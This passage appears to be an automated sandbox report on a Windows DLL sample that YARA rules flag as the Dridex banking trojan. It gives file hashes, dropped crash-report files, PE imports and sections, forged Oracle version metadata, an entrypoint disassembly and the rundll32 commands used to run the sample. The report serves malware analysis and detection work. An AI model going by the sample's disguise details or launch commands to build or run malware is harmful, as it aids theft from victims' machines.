                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.5.0.0.9.6.2.4.1.2.5.1.7.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.e.f.f.a.a.1.e.-.6.b.7.a.-.4.b.2.b.-.9.d.1.f.-.d.a.5.f.2.0.7.2.7.0.4.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.a.6.5.c.b.8.-.4.3.a.4.-.4.2.f.a.-.9.c.0.6.-.4.2.5.a.0.3.7.e.4.1.f.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.6.0.-.0.0.0.1.-.0.0.1.b.-.f.3.d.6.-.c.e.5.1.7.5.f.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.u.n.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.8.6././.0.1././.3.0.:.1.1.:.4.2.:.4.4.!.1.0.3.d.
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER427.tmp.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4731
                                                                                                      Entropy (8bit):4.4479686247920664
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cvIwSD8zs5JgtWI9+i7WSC8BF8fm8M4JCdsA97Fej+q8vjsA9B4SrSOd:uITfLZiKSNYJyKKzzDWOd
                                                                                                      MD5:EEABF8D07101FD6411D2E76E3A546286
                                                                                                      SHA1:1D85E981286F68BBFBFEC81169E4766F082EE88F
                                                                                                      SHA-256:1A41F6023E303ED99DBA0945C98141C450E61F4D47C962479000937E7B5FE2B1
                                                                                                      SHA-512:4B090B15289481F7EFA4FBBA52A0A60B5CCF689EB8DCF1F9E8D0D28937BFBB4919431975D5558EAEE5E0ED329B27A333DFA34AA915BA0DF99165A5F3806E961E
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1314817" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERE64C.tmp.dmp
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Mini DuMP crash report, 14 streams, Sun Dec 26 16:27:01 2021, 0x1205a4 type
                                                                                                      Category:dropped
                                                                                                      Size (bytes):46978
                                                                                                      Entropy (8bit):2.1386478701324085
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:WmsgUOTajHiAM6SM4eO5Skb44ynjngyfxTlT/qw86om6nxTLzdeXYeq:bPabcBb5Lb44ynjgujqxTLz0I3
                                                                                                      MD5:206968ED73ECB16B39091E3625D9E8B0
                                                                                                      SHA1:2A98F0A379AAE0F97913FC801ECF159E09255E4E
                                                                                                      SHA-256:CFE4A48F936677001FD583B3956081ABCB47071C47667F57C36FDB7721078FBA
                                                                                                      SHA-512:5DF3181BBE7CB38549AA965B8AA69EFD5984DB683C18834104A42009AA840947900261077FDEF7B92CB460F840891E129A6E74E43AD2636DDB6FB3350E151A1B
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: MDMP....... .........a........................`................1..........T.......8...........T...........p................................................................................................U...........B....... ......GenuineIntelW...........T.......T......a.............................0..=...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE1D.tmp.WERInternalMetadata.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8272
                                                                                                      Entropy (8bit):3.6954724365915483
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Rrl7r3GLNiTa6ft16YnY66VgmfTwDSD+prV89bIZoSmsf7uZm:RrlsNiO6ft16YY66VgmfTUS1IZoSFf6U
                                                                                                      MD5:7DF9F40560D821B578853C8AC59820CF
                                                                                                      SHA1:AC4C351449BD25EA0C96154B639608C4DBDFC9E3
                                                                                                      SHA-256:72B22A8BBF5A8C54889D0C69E38A657A6E80ADD044B13984DF2FA06AE0E08D50
                                                                                                      SHA-512:1CEC619AA943A0811847BDE98A7E002BBF862C21C2D843B4A4F3F6E272F62BB08F404E17B5F3F2493D032B9D5932255612A558D75FDB60C51992872BD9686BCA
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.8.4.<./.P.i.d.>.......
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF36D.tmp.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4630
                                                                                                      Entropy (8bit):4.462773353078608
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cvIwSD8zs5JgtWI9+i7WSC8By8fm8M4JCdsA9DFoVk+q8/F5n/4SrSLd:uITfLZiKSN9JyVCVDWLd
                                                                                                      MD5:2B32C46F97FB98D0B8ED6299C04C3C60
                                                                                                      SHA1:ED6759009A19FA06FFB87EDBA2368A5C6A6018F9
                                                                                                      SHA-256:1A867D30844F3A066C98E1937B7F9BEA48BA66FCDD7D8413603B536A059E9431
                                                                                                      SHA-512:93B87F21C32F2BF80ED38233F9D46A62FDF3190A7F1E71E9D41CE010DBE97D23E9EFE0AC65DF1ED03FD9ED39B77526A4936ECADEE4EAAA70B063C6155F35E13E
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1314817" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6D6.tmp.dmp
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sun Dec 26 16:27:06 2021, 0x1205a4 type
                                                                                                      Category:dropped
                                                                                                      Size (bytes):48114
                                                                                                      Entropy (8bit):2.214478850648368
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:spSTPOAweBQ1yPO5Skb0n5F8OAJBMhY7Cic64tYqRd:5R7Wp5LbauJJ7oOqf
                                                                                                      MD5:CDA1D8C55F50A313FF3D2A7329EBCAE7
                                                                                                      SHA1:96F7234CF1C8F68C220804F09D1C3AB22382D81C
                                                                                                      SHA-256:9CC5AF8951F9F570166671864ABC67DE2093209CC54F3495DB89B9CF96745D06
                                                                                                      SHA-512:BD069989775B4E5CCF8727CAA79E413D20F3E216E5888F247981A90785D42FF1D9C4A072A60324871F09DC0DB4600BC0F5C30CEC714BDCB7135A872A27442213
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: MDMP....... .........a........................|...........$...$ ...........4..........`.......8...........T............"..............H ..........4"...................................................................U...........B......."......GenuineIntelW...........T.......`......a.............................0..=...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9.tmp.WERInternalMetadata.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8352
                                                                                                      Entropy (8bit):3.6888277131607947
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Rrl7r3GLNiwo6L6YnY6Dgmf8ZSY+pB789bI9ssf/ulm:RrlsNiX6L6YY6Dgmf8ZSKI9/f2o
                                                                                                      MD5:C67D9D1CFEB29DE16FC73541620A6BCC
                                                                                                      SHA1:2FA1A6B3F4D4FC257A7BC337F10061B33109CEAA
                                                                                                      SHA-256:C3D56890FC63DA7B18860D0C3C9B9761FD843466BB42707F6C7B418EA11FEEBF
                                                                                                      SHA-512:D9FEA34D57691311F930763F5BFAABCCE36CE3705337A9783152197E3E002F14DB5292B832B316D9D2D12FB6FA5CE99195AA3A85B06BD43AD8C47A9818561675
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.9.6.<./.P.i.d.>.......
                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1572864
                                                                                                      Entropy (8bit):4.240225930170385
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:vq9elvRGZTfXh9g7lg9YTkV8gUnsMhEhczXfTDaT6toEwdfj:S9elvRGZTfR9g7vhg
                                                                                                      MD5:B33794E3C6B1BEB6D6B2581831709E4D
                                                                                                      SHA1:BC9BB5B86AE5D7EC84E8F45ED0B93F5C03A27AE3
                                                                                                      SHA-256:2AC4F58765C291C6D51B5C2CA28421A9996607457DD0D05F8BF5275FC7F28759
                                                                                                      SHA-512:55DD41010C8783E6CE731A7FD38AB9A3897756A759264C7157E61F65DEC3E22B5ADE92CCE1564447005E2FB65E744C4F4B1B0867B8874A00C009F09EFEF43CA3
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm^Z_gu...............................................................................................................................................................................................................................................................................................................................................kc[:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):3.407583074430547
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:OH5GY5K5PPv4EgnVVeeDzeQ1NKZtjoT8GpwL1033SYH:ipKjg/eeDzeuNYtjpGpwLkSY
                                                                                                      MD5:3A7B0EC19DB89A30EB62BF9891DF07F8
                                                                                                      SHA1:95EA4D60CA49F5DB36207E645B5EB1B936190159
                                                                                                      SHA-256:1771EAB3A5D72F77997C3029E5900693DFDC0057DB2038548A9702B74864B397
                                                                                                      SHA-512:D355B50B97CBF4C65894924B0A115B91A5487AB96685FFB3F23349EC9E3F6214A24CFDC58DFDBBECADC5489A0E8C196FF039183A75052AB46C4639CB7CCBA60C
                                                                                                      Malicious:false
                                                                                                      Preview: regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm^Z_gu...............................................................................................................................................................................................................................................................................................................................................mc[:HvLE.N......G................-..{k!.dhS..................... ..hbin................p.\..,..........nk,..agu................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..agu....... ........................... .......Z.......................Root........lf......Root....nk ..agu................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.269426930570889
                                                                                                      TrID:
                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:G7ABVJxc3Z.dll
                                                                                                      File size:536576
                                                                                                      MD5:47c59530065e8e7e05a855879bf8a922
                                                                                                      SHA1:8fba3ea2428f92e8dc8497514d0817b54edc5be0
                                                                                                      SHA256:e4db910a4147ac44bef76f71e6b0d6bd193b89a6268dda35f3b1c210cc111fe4
                                                                                                      SHA512:c99e35f6313aa75f24b7bdb1cc9e91eb7246dd7cd79de9c18f50d1f6ee27984ff075c108d1025e16dbd6d03087d11bcb6f927c5773e8a03d7bdd02c204782a42
                                                                                                      SSDEEP:6144:4KMImhktm7mnmvetmzK/kxwv4Zm7mREqZzdazdULd54f3X0kdVtL8faGAPlX:49hXAg5aX0CL8fI
                                                                                                      File Content Preview:MZ......................@...................................P......E;...;...;....Xl.....................2.4.^....uh.{...6.F......Xl.....F.z..............u..........z.......................@...8.{.G...;.......Rich;..........................................

                                                                                                      File Icon

                                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x10005a10
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x10000000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x61B705D1 [Mon Dec 13 08:35:29 2021 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:e9192d34e4c9dcdf739aaa1d74025eb2

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      mov edx, 00000003h
                                                                                                      cmpps xmm1, xmm0, 02h
                                                                                                      add eax, 0Ch
                                                                                                      add eax, 0Ch
                                                                                                      add eax, 0Ch
                                                                                                      add eax, 0Ch
                                                                                                      add eax, 0Ch
                                                                                                      add eax, 0Ch
                                                                                                      cmp edx, 03h
                                                                                                      je 00007F8410AF0892h
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      push edi
                                                                                                      push ebx
                                                                                                      push esi
                                                                                                      and esp, FFFFFFF8h
                                                                                                      sub esp, 000000A0h
                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                      mov ecx, 006B34C2h
                                                                                                      mov edx, dword ptr [esp+7Ch]
                                                                                                      mov dword ptr [esp+7Ch], 3CDA3086h
                                                                                                      mov dword ptr [esp+00000094h], 00000000h
                                                                                                      mov dword ptr [esp+00000090h], 006C4587h
                                                                                                      mov byte ptr [esp+7Ah], FFFFFFBDh
                                                                                                      mov dword ptr [esp+74h], 629729F9h
                                                                                                      mov byte ptr [esp+65h], FFFFFFF1h
                                                                                                      mov dword ptr [esp+38h], 694CC273h
                                                                                                      mov esi, dword ptr [esp+00000094h]
                                                                                                      mov edi, dword ptr [esp+00000090h]
                                                                                                      mov ebx, edi
                                                                                                      add ebx, 171E5389h
                                                                                                      mov dword ptr [esp+30h], eax
                                                                                                      mov eax, esi
                                                                                                      adc eax, 00000000h
                                                                                                      mov dword ptr [esp+48h], ebx
                                                                                                      mov dword ptr [esp+4Ch], eax
                                                                                                      mov dword ptr [esp+2Ch], edi
                                                                                                      mov dword ptr [esp+28h], ecx
                                                                                                      mov dword ptr [esp+24h], edx
                                                                                                      mov dword ptr [esp+20h], esi
                                                                                                      call 00007F8410AF4296h
                                                                                                      mov ecx, 4C276534h
                                                                                                      mov edx, dword ptr [esp+2Ch]

                                                                                                      Data Directories

                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x780d00x64.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x781b00x17c.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x820000x2f0.rsrc
                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x830000x1214.reloc
                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x90f00x38.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x90000xe8.rdata
                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                      Sections

                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                      .text0x10000x74d80x8000False0.360290527344data4.61113521989IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                      .rdata0x90000x6fff80x70000False0.311179024833data7.3778786518IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .data0x790000x80f40x7000False0.295828683036data6.02916609898IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                      .rsrc0x820000xec80x1000False0.090087890625data0.784979301457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                      .reloc0x830000x12140x2000False0.287475585938data4.27724948186IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                      Resources

                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                      RT_VERSION0x820600x290MS Windows COFF PA-RISC object fileEnglishUnited States

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllCreateFileW, GetProcessVersion, GetModuleFileNameW, CloseHandle, VirtualAllocEx, DeleteTimerQueue, InitAtomTable
                                                                                                      msvcrt.dllwcscoll
                                                                                                      SETUPAPI.dllSetupDiOpenDeviceInterfaceW
                                                                                                      WININET.dllInternetReadFile
                                                                                                      RPCRT4.dllRpcMgmtSetCancelTimeout, NdrGetUserMarshalInfo
                                                                                                      LZ32.dllLZCopy
                                                                                                      USER32.dllBlockInput, TranslateMessage, FillRect, GetWindowTextA, DefMDIChildProcW, GetWindowContextHelpId, IsWinEventHookInstalled, GetClassNameA
                                                                                                      NTDSAPI.dllDsGetDomainControllerInfoW
                                                                                                      IPHLPAPI.DLLGetIpAddrTable
                                                                                                      WS2_32.dllWSACleanup, inet_addr
                                                                                                      IMM32.dllImmGetCandidateListW
                                                                                                      ADVAPI32.dllCreateRestrictedToken, CryptGenKey, CryptAcquireContextW, RegCloseKey, CryptContextAddRef
                                                                                                      GDI32.dllGetViewportOrgEx, SetWindowOrgEx
                                                                                                      pdh.dllPdhAddCounterW
                                                                                                      ole32.dllCoCreateInstanceEx, CoGetObjectContext, StringFromGUID2
                                                                                                      WINMM.dllwaveOutGetPitch
                                                                                                      SHLWAPI.dllAssocGetPerceivedType
                                                                                                      ESENT.dllJetInit

                                                                                                      Exports

                                                                                                      NameOrdinalAddress
                                                                                                      Wgpomsdeeomtunmdrt10x10078125

                                                                                                      Version Infos

                                                                                                      DescriptionData
                                                                                                      OriginalFilenameHen.dll
                                                                                                      FileDescriptionOracle Call Interface
                                                                                                      FileVersion7.0.2.1.0
                                                                                                      Legal CopyrightCopyright Oracle Corporation 1979, 2001. All rights reserved.
                                                                                                      CompanyNameOracle Corporation
                                                                                                      Translation0x0409 0x04b0

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      No network behavior found

                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      Analysis Process: loaddll32.exe PID: 6380 Parent PID: 5204

                                                                                                      General

                                                                                                      Start time:17:26:21
                                                                                                      Start date:26/12/2021
                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:loaddll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll"
                                                                                                      Imagebase:0xc30000
                                                                                                      File size:116736 bytes
                                                                                                      MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: cmd.exe PID: 6376 Parent PID: 6380

                                                                                                      General

                                                                                                      Start time:17:26:21
                                                                                                      Start date:26/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1
                                                                                                      Imagebase:0x11d0000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

                                                                                                      Analysis Process: rundll32.exe PID: 6496 Parent PID: 6380

                                                                                                      General

                                                                                                      Start time:17:26:22
                                                                                                      Start date:26/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\G7ABVJxc3Z.dll,Wgpomsdeeomtunmdrt
                                                                                                      Imagebase:0xa50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.740603075.000000006E471000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.742949248.000000006E471000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Chronological Activities

